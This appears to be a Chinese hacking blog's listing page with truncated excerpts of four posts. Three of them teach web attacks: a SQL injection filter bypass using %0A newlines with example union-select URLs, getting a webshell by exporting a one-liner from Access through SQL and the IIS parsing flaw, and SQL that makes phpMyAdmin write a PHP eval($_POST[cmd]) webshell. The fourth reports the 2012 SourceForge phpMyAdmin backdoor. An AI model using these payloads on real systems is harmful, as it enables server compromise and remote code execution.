GET参数SQL注入%0A换行污染绕过

绕过描述: 在GET请求时,将URL的SQL注入关键字用%0A分隔,%0A是换行符,在mysql中可以正常执行。   测试方法: 请求测试url:https://www.webshell.cc/1.php?id=1%20union%20select%201,2,3,4  — 被拦截   请求测试url:https://www.webshell.cc/1.php?id=-9%0Aun...

- 阅读全文 -

ACCESS执行SQL语句导出一句话拿webshell

实用环境,在access后台其他方法不能拿到webshell 但是后台有SQL语句查询执行,就可以直接access导出一句话拿webshell了 不过需要知道物理路径才能导出,利用IIS的解析漏洞导出EXCEL文件拿到webshell,因为ACCESS数据库不允许导出其他危险格式。 至于怎么拿到物理路径就看你自己发挥了,报错或备份路径等。 逐一执行以下语句就可以导出一句话了 第一句代码 creat...

- 阅读全文 -

phpmyadmin 导出 shell 至中文路径

set character_set_client='gbk'; set character_set_connection='gbk'; set character_set_database='gbk'; set character_set_results='gbk'; set character_set_server='gbk'; select '<?php eval($_POST[cmd]...

- 阅读全文 -

SourceForge被黑客入侵 phpMyadmin被植入后门

2012年9月25日消息,今天微博爆出消息,国外知名下载网站SourceForge韩国CDN节点疑似被入侵,热门下载资源phpMyadmin被植入后门。 SourceForge. net是世界上最大的开源软件开发网站。很多国外非常有用的资源都可以从上面下载。而由于国内目前暂无SourceForge的CDN节点,导致从国内访问下载均是从韩国节点获取数据。对国内用户影响非常大。 国内用户从韩国节点下载...

- 阅读全文 -